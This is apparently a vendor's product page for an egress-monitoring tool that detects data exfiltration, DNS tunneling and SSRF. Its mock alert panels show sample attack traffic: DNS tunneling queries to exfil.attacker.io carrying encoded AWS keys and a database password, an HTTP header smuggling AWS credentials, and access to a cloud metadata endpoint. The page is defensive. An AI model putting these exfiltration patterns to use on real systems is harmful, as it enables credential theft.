Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
RUNEgress Monitor

Data leaving your network should never be a surprise.

O3 builds a baseline of normal egress behavior for every service, then alerts the moment something deviates — unexpected destinations, new protocols, unusual volumes, or the unmistakable signature of data exfiltration.

Behavioral Baseline

Normal egress, defined per service. Not by a vendor signature.

O3 learns normal outbound behavior for each service independently — which IPs it connects to, which domains it resolves, which ports it uses, and at what volumes. Baselines update as behavior legitimately changes.

Per-service baseline, not cluster-wide averages
Destinations, protocols, volumes, and timing all baselined
Automatic baseline update on gradual behavior change
Alert only on statistically significant deviations
O3 Egress Baseline — service: payments-api
Active
Baseline profile
Destinationsdb.internal:5432, redis.internal:6379, api.stripe.com:443
DNSstripe.com, internal.svc.cluster.local
Volume1.2–4.8 MB/hr · port 443 only
Timingbusiness hours + on-demand requests
Anomaly detected 14:32:07
NEW: 185.220.101.47:443
Never seen from this service · ASN: AS4134
Volume: 342 KB in 8 min
DNS: dGVzdGRhdGE=.exfil.attacker.io → Matches DNS tunneling pattern
L7 Deep Inspection

Connection metadata is the floor. O3 reads what's inside.

Not just connection metadata — O3 inspects HTTP headers, request bodies, and response payloads. It detects secrets in API calls, data staged in user-agent strings, and encoding tricks attackers use to hide exfiltration.

HTTP headers and body content inspected
Secrets detected in outbound API calls
Base64 and hex encoding detected in transit
User-agent and custom header abuse surfaced
O3 L7 Inspector — payments-api → api.unknown.io
Suspicious
HTTP request intercepted
POST /collect HTTP/1.1
Host: api.unknown.io
User-Agent: Mozilla/5.0 (compatible)
Content-Type: application/json
X-Data: eyJhd3Nfa2V5IjoiQUtJQS4uLiIsImF3c19zZWNyZXQiOiJ3SmFsci4uLiJ9
Base64 decoded
{ aws_key: 'AKIA...', aws_secret: 'wJalr...' }

AWS credentials exfiltrated in custom HTTP header. Destination: api.unknown.io:443 — first contact from this service.

DNS Tunneling Detection

Data hidden in DNS queries. A blind spot for volume-based monitors.

Data encoded in DNS query strings and unusually long subdomains is a common exfiltration channel that volume-based monitors miss entirely. O3 inspects DNS query patterns and flags tunneling attempts in real time.

Long subdomain entropy analysis
Base64 and hex in subdomain labels detected
Query rate and TTL anomalies flagged
Known DNS tunneling tool signatures matched
O3 DNS Monitor — payments-api
Tunneling detected
14:31:58dGVzdGRhdGExMjM=.exfil.attacker.io
185.220.101.47
14:32:01c3NrZXkuYXdzLmFtYXpvbi5jb20K.exfil.attacker.io
185.220.101.47
14:32:04UkRTcGFzc3dvcmQ9c2VjcmV0MTIz.exfil.attacker.io
185.220.101.47
Subdomain entropy: 4.8 bits/char (threshold: 3.5)
Decoded: AWS key + RDS password
C2 confirmed: exfil.attacker.io
Exfiltrated: 847 bytes
Allowlist Enforcement

Define what's expected. Block everything else.

Define expected egress destinations per service. O3 enforces the policy and alerts on any connection outside the allowlist — including cloud metadata API access from unexpected services, a classic SSRF exploitation signal.

Per-service allowlist definition
Any off-list connection blocked and alerted
Cloud metadata API (169.254.169.254) access monitored
SSRF exploitation via metadata endpoint detected
O3 Egress Policy — payments-api
1 violation
Policy — Allowed destinations
db.internal:5432, redis.internal:6379, api.stripe.com:443
14:32:07185.220.101.47:443
BLOCKEDNOT IN ALLOWLIST
14:33:12169.254.169.254:80/latest/meta-data/
SSRF exploitation attempt
BLOCKEDMETADATA API
14:34:01api.stripe.com:443
PASSALLOWED

SSRF detected: payments-api queried instance metadata endpoint. Possible credential theft attempt. Pod isolated.

See every connection leaving your network.

Book a demo and see O3 establish egress baselines and surface anomalies across every service.

FAQ

Questions,
answered.

Everything teams ask before rolling this out. Still stuck? Reach our team.

  • O3 passively observes outbound network traffic per service during a learning period, typically 24 to 48 hours, and builds a behavioral model of normal destinations, DNS queries, protocols, and transfer volumes. The baseline is per-service, not per-cluster, so a deviant behavior in one service does not affect detection thresholds for others. Baselines update continuously as legitimate behavior changes.
  • L7 deep packet inspection means O3 examines the application layer of network traffic. HTTP headers, request bodies, response payloads, not just IP addresses and ports. Attackers frequently hide exfiltrated data inside legitimate-looking HTTPS calls, encoding sensitive content in user-agent strings or custom headers. L7 inspection catches these patterns that metadata-only monitoring misses.
  • DNS tunneling encodes data in DNS query subdomains, the client sends data out as DNS lookups and the attacker-controlled DNS server receives it. O3 detects this by analyzing query entropy (unusually long or high-entropy subdomains), query frequency anomalies, and response sizes. Any DNS query matching tunneling signatures triggers an alert within seconds.
  • Yes. O3 integrates at the service mesh or sidecar layer, where it has access to plaintext traffic before it is encrypted for transmission. In environments without a service mesh, O3 uses TLS interception at the egress point to inspect payload content. The exact integration method depends on your infrastructure setup.
  • O3 raises an alert within 2 seconds of the first anomalous packet, including the source service, destination IP and ASN, transferred volume, a classification of the anomaly type (e.g., DNS tunneling, new destination, exfiltration pattern), and a recommended response action. Alerts integrate with PagerDuty, Slack, and SIEM systems. Optional automatic pod isolation is available for high-confidence exfiltration events.